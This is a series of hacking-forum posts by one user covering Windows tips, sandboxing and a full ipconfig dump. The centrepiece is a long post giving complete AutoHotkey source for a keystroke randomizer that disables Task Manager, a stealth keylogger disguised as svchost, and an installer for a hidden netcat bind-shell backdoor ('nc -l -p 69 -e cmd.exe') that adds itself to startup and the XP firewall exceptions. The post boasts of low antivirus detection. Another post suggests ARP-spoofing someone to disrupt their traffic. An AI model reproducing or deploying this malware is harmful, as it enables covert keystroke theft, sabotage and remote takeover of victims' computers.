sablefoxx

I love Sandboxie, but they'll probably never be a 64-bit version due to the Kernel protection built into Windows Vista/7, it'd be awesome to something as robust as Sandboxie built into the OS. Yeah, lol, Thinstall (just recently renamed to "thinapp") is very useful (kinda an old post) http://hak5.org/forums/index.php?showtopic...mp;hl=Thinstall

TrueCrypt will do this this (see "truecrypt hidden volumes"), just be sure not to write to much data or you may erase data in the 'hidden volume', plus TrueCrypt works on almost any OS.

Been running the beta of Windows 7 for a couple days and i noticed that in the Task Manager, when you right click on a process there is now an option called "UAC Virtualization", does anyone know what this does? I did some Googling but i could only find information on Vista, i also noticed that they finally added "Open File Location" and "Go to Service(s)" to the right click menu by default (yay!).

Was anyone actually able to buy them at that price?

Thing is i never used any of those apps, so i like that they took them out. I had the same problem, so i downloaded it using IE7 and it worked fine got it at about 700Kb-1Mb down.

who even uses WMP?

...pussies

ubuntu-unleashed.com and google

If you liked the Wii Fail talk check out the "deconstructing the xbox security system" video, its a couple years old but still very interesting to watch.

Yeah, alrdy did this a while ago, here is my post (with full source): http://hak5.org/forums/index.php?showtopic=11136

MD5 SSL singed certs are history...

The zunes are not 'Bricked' they will work again on 1/1/09...off by one error by M$ (surprise, surprise)

Most modern AVs have kernel hooks so you cant stop the service (thats what "net stop [service name here]" does) or kill the service from user space, also "kill" isn't a command (at least in Vista/XP), so you're missing the kill.exe (if there is one), you could at least change it to "taskkill /f /im [name here]" but again, you cant taskkill most AV processes either (kernel hooks again). So it won't work sorry...

There are some really interesting talks here, check out the iphone talk!

awesome video, im gonna have to pick one of these up myself

#xbins

Is it possible to change your MAC in Vista without 3rd party software (i know i can do that)?

From command line type: ipconfig /all You Should See Something Like This: Microsoft Windows [Version 6.0.6001] Copyright © 2006 Microsoft Corporation. All rights reserved. C:\Users\Sable>ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : Sable-PC Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : Ethernet adapter Local Area Connection 2: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : NVIDIA nForce 10/100/1000 Mbps Ethernet # 2 Physical Address. . . . . . . . . : 00-04-4B-18-89-25 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : NVIDIA nForce 10/100/1000 Mbps Ethernet Physical Address. . . . . . . . . : 00-04-4B-18-89-26 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::e541:a2f7:692c:f5df%10(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.1.105(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Sunday, December 14, 2008 6:35:12 PM Lease Expires . . . . . . . . . . : Monday, December 15, 2008 6:35:10 PM Default Gateway . . . . . . . . . : 192.168.1.1 DHCP Server . . . . . . . . . . . : 192.168.1.1 DNS Servers . . . . . . . . . . . : 208.67.220.222 208.67.220.220 NetBIOS over Tcpip. . . . . . . . : Enabled Ethernet adapter VMware Network Adapter VMnet1: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet 1 Physical Address. . . . . . . . . : 00-50-56-C0-00-01 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::78cc:ec89:556b:5865%14(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.80.1(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1 fec0:0:0:ffff::2%1 fec0:0:0:ffff::3%1 NetBIOS over Tcpip. . . . . . . . : Enabled Ethernet adapter VMware Network Adapter VMnet8: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet 8 Physical Address. . . . . . . . . : 00-50-56-C0-00-08 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::f1fe:3f0f:75cd:3f33%16(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.49.1(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1 fec0:0:0:ffff::2%1 fec0:0:0:ffff::3%1 NetBIOS over Tcpip. . . . . . . . : Enabled Ethernet adapter Hamachi: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Hamachi Network Interface Physical Address. . . . . . . . . : 7A-79-05-6E-CC-F9 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 5.110.204.249(Preferred) Subnet Mask . . . . . . . . . . . : 255.0.0.0 Lease Obtained. . . . . . . . . . : Sunday, December 14, 2008 6:35:12 PM Lease Expires . . . . . . . . . . : Monday, December 14, 2009 6:39:25 PM Default Gateway . . . . . . . . . : 5.0.0.1 DHCP Server . . . . . . . . . . . : 5.0.0.1 NetBIOS over Tcpip. . . . . . . . : Enabled Tunnel adapter Local Area Connection* 6: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : isatap.{660BF523-F59D-4E88-8BDA-9072838DB 3D8} Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Tunnel adapter Local Area Connection* 7: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : isatap.{7884D6F6-C939-428B-ABD1-B1AA1AE16 317} Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Tunnel adapter Local Area Connection* 11: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface Physical Address. . . . . . . . . : 02-00-54-55-4E-01 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Tunnel adapter Local Area Connection* 12: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : isatap.{315E2282-04A0-436D-AB07-3BA1C3972 1CD} Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Tunnel adapter Local Area Connection* 13: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : isatap.{30170173-8B5D-4A76-A0A3-491C5060B 023} Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Tunnel adapter Local Area Connection* 14: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::5efe:192.168.1.105%19(Preferred) Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : 208.67.220.222 208.67.220.220 NetBIOS over Tcpip. . . . . . . . : Disabled Tunnel adapter Local Area Connection* 15: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : isatap.{95843465-6F84-4848-B61C-290E4A1CD 9D1} Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::200:5efe:5.110.204.249%21(Preferred ) Default Gateway . . . . . . . . . : NetBIOS over Tcpip. . . . . . . . : Disabled Tunnel adapter Local Area Connection* 16: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : 6TO4 Adapter Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes IPv6 Address. . . . . . . . . . . : 2002:56e:ccf9::56e:ccf9(Preferred) Default Gateway . . . . . . . . . : 2002:c058:6301::c058:6301 NetBIOS over Tcpip. . . . . . . . : Disabled C:\Users\Sable> Here is the subnet (Ethernet adapter Local Area Connection): Subnet Mask . . . . . . . . . . . : 255.255.255.0

i still got invites, pm me if ya need one

Almost no CPU load, takes about 4k memory

WARNING VERY LONG POST! For sometime now, i've been coding stuff in c, in fact i wrote versions of keyl and keyr in c, then i found ahk while trying to find a way to install my cmdo payload in a single .exe, turns out ahk has been used on this forum before, but i forgot about it until a few days ago. AHK is an awesome scripting lang that takes all the hard work out of keyboard hooks! So i re-wrote the apps, and here is the ahk source code, so everyone can learn how fun and easy this scripting lang is. Post bugs if you find them, and have fun! Feel free to hack/mod/use this code anyway you want (works nicely with usb payloads). :) None of these programs are illegal. Morality and legality lie in the application of knowledge, not in the information itself. PM/IRC/AIM me with questions. PROGRAMS AND FEATURES 1. Keyr -Randomizes Keys on the keyboard -Adds itself to startup (regkey) -Works on WinXP / Vista -Disables Task Mgr (regkey) -Press WinKey + X to quit -Only about 10% of AntiVirus found it (VirusTotal) [Download keyr v1] MD5...: de40e57473c719d84da9b1a9e2527a86 2. Keyl -Your basic keylogger, saves keystrokes to C:\WINDOWS\keyl.txt -Adds itself to startup (RegKey) -Completely Stealthed -Looks like svchost while running -Works on XP / Vista -Press WinKey + X to quit -Only about 5% of AntiVirus found it (VirusTotal) [Download keyl v1.1] MD5...: ebb7ab566064661707956a64be7f01b3 3. Cmdo -Updated Cmdo Payload -Installs a Netcat backdoor (reverse shell) -Single .exe Install File -Adds itself to startup (regkey) -Completely Stealthed -In XP adds itself to the firewall exceptions list, and hides itself from the GUI -Easy to use Auto Connect Script -Downside is nc.exe has 68% detection rate (VirusTotal) [Download cmdo v1] MD5...: 260f8f4566635734a8c663358752c108 AHK SOURCE CODE So basically for all of them, there is the actual .exe's (contain the payload), and the install file, the install file only needs to be run once, and it adds regkeys/makes dirs/sets attribs/etc, i commented the code best i could >Keyr keyr_install.exe ;Install Keyr.exe into root of C: ;Keyr Script has to be compiled first! #NoTrayIcon FileInstall, .\keyr.exe, C:\keyr.exe ;add to startup RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,keyr,C:\keyr.exe ;disable task mgr RegWrite REG_DWORD,HKEY_CURRENT_USER,software\microsoft\windows\currentversion\policies\system,DisableTaskMgr,1 FileSetAttrib, +SH, C:\keyr.exe Run C:\keyr.exe ExitApp keyr.exe ;KeyStroke Randomizer ;keyr.exe v1.0 ;By SableFoXx #NoEnv #NoTrayIcon #InstallKeybdHook #x:: MsgBox, Exit Function Invoked ExitApp ;---------------- ; ALPHA KEYS ;---------------- ; The $ stops recusrion $a::GetAlpha() $b::GetAlpha() $c::GetAlpha() $d::GetAlpha() $e::GetAlpha() $f::GetAlpha() $g::GetAlpha() $h::GetAlpha() $i::GetAlpha() $j::GetAlpha() $k::GetAlpha() $l::GetAlpha() $m::GetAlpha() $n::GetAlpha() $o::GetAlpha() $p::GetAlpha() $q::GetAlpha() $r::GetAlpha() $s::GetAlpha() $t::GetAlpha() $u::GetAlpha() $v::GetAlpha() $w::GetAlpha() ;$x::GetAlpha() - Only if you're evil $y::GetAlpha() $z::GetAlpha() ; Don't Forget CAPS! $+a::GetAlpha() $+b::GetAlpha() $+c::GetAlpha() $+d::GetAlpha() $+e::GetAlpha() $+f::GetAlpha() $+g::GetAlpha() $+h::GetAlpha() $+i::GetAlpha() $+j::GetAlpha() $+k::GetAlpha() $+l::GetAlpha() $+m::GetAlpha() $+n::GetAlpha() $+o::GetAlpha() $+p::GetAlpha() $+q::GetAlpha() $+r::GetAlpha() $+s::GetAlpha() $+t::GetAlpha() $+u::GetAlpha() $+v::GetAlpha() $+w::GetAlpha() $+x::GetAlpha() $+y::GetAlpha() $+z::GetAlpha() CapsLock::MsgBox, WARNING: This Button Does Nothing! ;---------------- ; NUM KEYS ;---------------- $0::GetNum() $1::GetNum() $2::GetNum() $3::GetNum() $4::GetNum() $5::GetNum() $6::GetNum() $7::GetNum() $8::GetNum() $9::GetNum() $Numpad0::GetNum() $Numpad1::GetNum() $Numpad2::GetNum() $Numpad3::GetNum() $Numpad4::GetNum() $Numpad5::GetNum() $Numpad6::GetNum() $Numpad7::GetNum() $Numpad8::GetNum() $Numpad9::GetNum() ;Fun-Sions GetNum(){ Random, num, 0, 10 if(num = 10) Shutdown, 4 else SendInput, %num% } GetAlpha(){ ; I wish i could so a switch() Random, alpha, 1, 26 If(alpha = 1) SendInput, a If(alpha = 2) SendInput, b If(alpha = 3) SendInput, c If(alpha = 4) SendInput, d If(alpha = 5) SendInput, e If(alpha = 6) SendInput, f If(alpha = 7) SendInput, g If(alpha = 8) SendInput, h If(alpha = 9) SendInput, i If(alpha = 10) SendInput, j If(alpha = 11) SendInput, k If(alpha = 12) SendInput, l If(alpha = 13) SendInput, m If(alpha = 14) SendInput, n If(alpha = 15) SendInput, o If(alpha = 16) SendInput, p If(alpha = 17) SendInput, q If(alpha = 18) SendInput, r If(alpha = 19) SendInput, s If(alpha = 20) SendInput, t If(alpha = 21) SendInput, u If(alpha = 22) SendInput, v If(alpha = 23) SendInput, w If(alpha = 24) SendInput, x If(alpha = 25) SendInput, y If(alpha = 26) SendInput, z } ; -=d0tmayhem=- >keyl keyl_install.exe ;Install Svchost.exe into the root C:\ ;Keyl Script has to be compiled first, ;and renamed to svchost, after being compiled ;============================================== #NoTrayIcon ;Remove old one IfNotExist, C:\svchost.exe, goto install SendInput, #x Sleep, 1000 FileSetAttrib, -SH, C:\svchost.exe install: FileInstall, .\svhost.exe, C:\svhost.exe, 1 RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\svchost.exe FileSetAttrib, +SH, C:\svchost.exe Run, C:\svchost.exe ExitApp keyl.exe ;======================= ; Keylogger (keyl.exe) ; By SableFoXx ; v1.1 ;======================= #NoEnv #NoTrayIcon #InstallKeybdHook #SingleInstance, Force SetWorkingDir %SystemRoot% FileAppend, `n[%A_MM%/%A_DD%/%A_YYYY% %A_hour%:%A_min%], C:\WINDOWS\keyl.txt Spc := " " #x:: ;WinKey + X to stop program MsgBox, 0, -=d0tmayhem=-, Keyl has been stopped, 10 ExitApp ;---------------- ; ALPHA KEYS ;---------------- $a::AlphaKey("a", "A") $b::AlphaKey("b", "B") $c::AlphaKey("c", "C") $d::AlphaKey("d", "D") $e::AlphaKey("e", "E") $f::AlphaKey("f", "F") $g::AlphaKey("g", "G") $h::AlphaKey("h", "H") $i::AlphaKey("i", "I") $j::AlphaKey("j", "J") $k::AlphaKey("k", "K") $l::AlphaKey("l", "L") $m::AlphaKey("m", "M") $n::AlphaKey("n", "N") $o::AlphaKey("o", "O") $p::AlphaKey("p", "P") $q::AlphaKey("q", "Q") $r::AlphaKey("r", "R") $s::AlphaKey("s", "S") $t::AlphaKey("t", "T") $u::AlphaKey("u", "U") $v::AlphaKey("v", "V") $w::AlphaKey("w", "W") $x::AlphaKey("x", "X") $y::AlphaKey("y", "Y") $z::AlphaKey("z", "Z") ;**Caps Keys** $+a::TransKey("+a", "A") $+b::TransKey("+b", "B") $+c::TransKey("+c", "C") $+d::TransKey("+d", "D") $+e::TransKey("+e", "E") $+f::TransKey("+f", "F") $+g::TransKey("+g", "G") $+h::TransKey("+h", "H") $+i::TransKey("+i", "I") $+j::TransKey("+j", "J") $+k::TransKey("+k", "K") $+l::TransKey("+l", "L") $+m::TransKey("+m", "M") $+n::TransKey("+n", "N") $+o::TransKey("+o", "O") $+p::TransKey("+p", "P") $+q::TransKey("+q", "Q") $+r::TransKey("+r", "R") $+s::TransKey("+s", "S") $+t::TransKey("+t", "T") $+u::TransKey("+u", "U") $+v::TransKey("+v", "V") $+w::TransKey("+w", "W") $+x::TransKey("+x", "X") $+y::TransKey("+y", "Y") $+z::TransKey("+z", "Z") ;---------------- ; NUM KEYS ;---------------- $0::GenKey("0") $1::GenKey("1") $2::GenKey("2") $3::GenKey("3") $4::GenKey("4") $5::GenKey("5") $6::GenKey("6") $7::GenKey("7") $8::GenKey("8") $9::GenKey("9") ;**Numpad Keys** $Numpad0::GenKey("0") $Numpad1::GenKey("1") $Numpad2::GenKey("2") $Numpad3::GenKey("3") $Numpad4::GenKey("4") $Numpad5::GenKey("5") $Numpad6::GenKey("6") $Numpad7::GenKey("7") $Numpad8::GenKey("8") $Numpad9::GenKey("9") ;**NumPad Symbls** $NumpadDot::GenKey(".") $NumpadDiv::GenKey("/") $NumpadSub::GenKey("-") $NumpadMult::GenKey("*") $NumpadAdd::ModfKey("+") $NumpadDel::ModfKey("Del") $NumpadEnd::ModfKey("End") $NumpadHome::ModfKey("Home") $NumpadPgUp::ModfKey("PgUp") $NumpadPgDn::ModfKey("PgDn") $NumpadIns::ModfKey("Insert") $NumpadEnter::ModfKey("Enter") ;---------------- ; FUNC KEYS ;---------------- $F1::ModfKey("F1") $F2::ModfKey("F2") $F3::ModfKey("F3") $F4::ModfKey("F4") $F5::ModfKey("F5") $F6::ModfKey("F6") $F7::ModfKey("F7") $F8::ModfKey("F8") $F9::ModfKey("F9") $F10::ModfKey("F10") $F11::ModfKey("F11") $F12::ModfKey("F12") ;---------------- ; SYBL KEYS ;---------------- $+0::TransKey("+0", ")") $+3::TransKey("+3", "#") $+4::TransKey("+4", "$") $+5::TransKey("+5", "%") $+6::TransKey("+6", "^") $+7::TransKey("+7", "&") $+8::TransKey("+8", "*") $+9::TransKey("+9", "(") $-::GenKey("-") $=::GenKey("=") $[::GenKey("[") $]::GenKey("]") $;::GenKey(";") $'::GenKey("'") $,::GenKey(",") $.::GenKey(".") $/::GenKey("/") $\::GenKey("\") $+-::GenKey("_") $+`::GenKey("~") $+;::GenKey(":") $+,::GenKey("<") $+.::GenKey(">") $+/::GenKey("?") $+\::GenKey("|") $+[::ModfKey("{") $+]::ModfKey("}") $+=::ModfKey("+") $`::TransKey("``", "``") ;---------------- ; SPCL KEYS ;---------------- ;These are used by ahotkey ;and need SendRaw to work $+1:: SendRaw, ! FileAppend, !, C:\WINDOWS\keyl.txt Return $+2:: SendRaw, @ FileAppend, @, C:\WINDOWS\keyl.txt Return $+':: SendRaw, " FileAppend, ", C:\WINDOWS\keyl.txt Return ;---------------- ; MODF KEYS ;---------------- $!::ModfKey("Alt") $^::ModfKey("Ctrl") $Tab::ModfKey("Tab") $End::ModfKey("End") $Home::ModfKey("Home") $PgUp::ModfKey("PgUp") $PgDn::ModfKey("PgDn") $Enter::ModfKey("Enter") $Pause::ModfKey("Pause") $+Pause::ModfKey("Break") $Insert::ModfKey("Insert") $Delete::ModfKey("Delete") $Backspace::ModfKey("Backspace") $PrintScreen::ModfKey("PrintScreen") $CapsLock::CapsLock() $Space:: SendInput, {Space} FileAppend, %Spc%, C:\WINDOWS\keyl.txt Return ;======================================================== ; FUNCTIONS ;======================================================== ;GenKey - Generic Key, takes one argument (the keystroke), appends same value to log ;Alpahkey - Takes the lower(akey)/upper(ukey) case alpha value and returns a lower, or upper ; depending on the state in which CapsLock is set ;TransKey - Translate Key, takes two arguments, the first is the raw keystroke (skey) and ; the secound is the alrdy translated key you want appended to the log file (xkey) ;ModfKey - Modifer Key, these are your ALT, WIN, and TAB keys, the arg should be the string you ; want passed to SendInput, Modf key strokes are marked with "[" and "]" in the log file ;CapsLock - First finds what state the CapsLock is in, then toggles it and appends the log ; file with either [CAPS-ON] or [CAPS-OFF] GenKey(gkey){ SendInput, %gkey% FileAppend, %gkey%, C:\WINDOWS\keyl.txt } AlphaKey(akey, ukey){ state := GetKeyState("Capslock", "T") if(state == "0"){ SendInput, %akey% FileAppend, %akey%, C:\WINDOWS\keyl.txt }else{ SendInput, %ukey% FileAppend, %ukey%, C:\WINDOWS\keyl.txt } } TransKey(skey, xkey){ SendInput, %skey% FileAppend, %xkey%, C:\WINDOWS\keyl.txt } ModfKey(mkey){ SendInput, {%mkey%} FileAppend, [%mkey%], C:\WINDOWS\keyl.txt } CapsLock(){ state := GetKeyState("Capslock", "T") if(state == "1"){ SetCapsLockState, Off FileAppend, [CAPS-OFF], C:\WINDOWS\keyl.txt }else{ SetCapsLockState, On FileAppend, [CAPS-ON], C:\WINDOWS\keyl.txt } } ; -=d0tmayhem=- >Cmdo [Download .exes] cmdo_install.exe ;Setup Cmdo Payload ;By SableFoXx #NoEnv #NoTrayIcon FileCreateDir, C:\cmdo FileSetAttrib, +SH, C:\cmdo FileInstall, .\cmdo.exe, C:\cmdo\cmdo.exe FileInstall, .\hidec.exe, C:\cmdo\hidec.exe FileInstall, .\nc.exe, C:\cmdo\nc.exe FileSetAttrib, +SH, C:\cmdo\cmdo.exe FileSetAttrib, +SH, C:\cmdo\hidec.exe FileSetAttrib, +SH, C:\cmdo\nc.exe ;Startup Key XP / VISTA RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\cmdo\cmdo.exe IfExist C:\WINDOWS\system32\wuapp.exe goto done xp: ;XP Firewall Key RegWrite REG_SZ,HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,C:\cmdo\nc.exe,C:\cmdo\nc.exe:*:Enabled:@xpsp2res.dll,-22019 goto done done: Run, C:\cmdo\cmdo.exe ExitApp cmdo.exe ;Cmdo.exe ;by SableFoXx ;Runs NC #NoEnv #NoTrayIcon #SingleInstance, Force Run, C:\cmdo\hidec.exe nc.exe -l -t -p 69 -d -e cmd.exe ExitApp Information is Free Damn that was a long post :)

Google hijacker also hides in your system32 dir, in a few .dll file not sure what the names are off the top of my head (had to remove it from a computer at work). Not sure if this is the same virus i found but it seemed to have a root-kit like aspect to it, had to boot into a PE to delete the files.

Assuming your on the same LAN, just ARP Spoof him and redirect his traffic to your computer, then don't route the traffic correctly :)

My understanding of it, when i saw it at defcon is that you can edit the code on the device, and change what it displays. Any luck doing so mubix? Segment on the show perhaps?

Well they are very different and each have their own uses, advantages and disadvantages. Not sure exactly what "I'm looking for the best way to be invisible on the net" means. Do you want to make is so people cannot track your browsing habits, or are you trying to communicate with other people and trade files with one another? PROXY: Good for anonymous surfing, but is not 100% fool proof VPN: Highly encrypted private network that only people you know can access (wont help you surf the internet) Note: these two technologies can be combined and used together.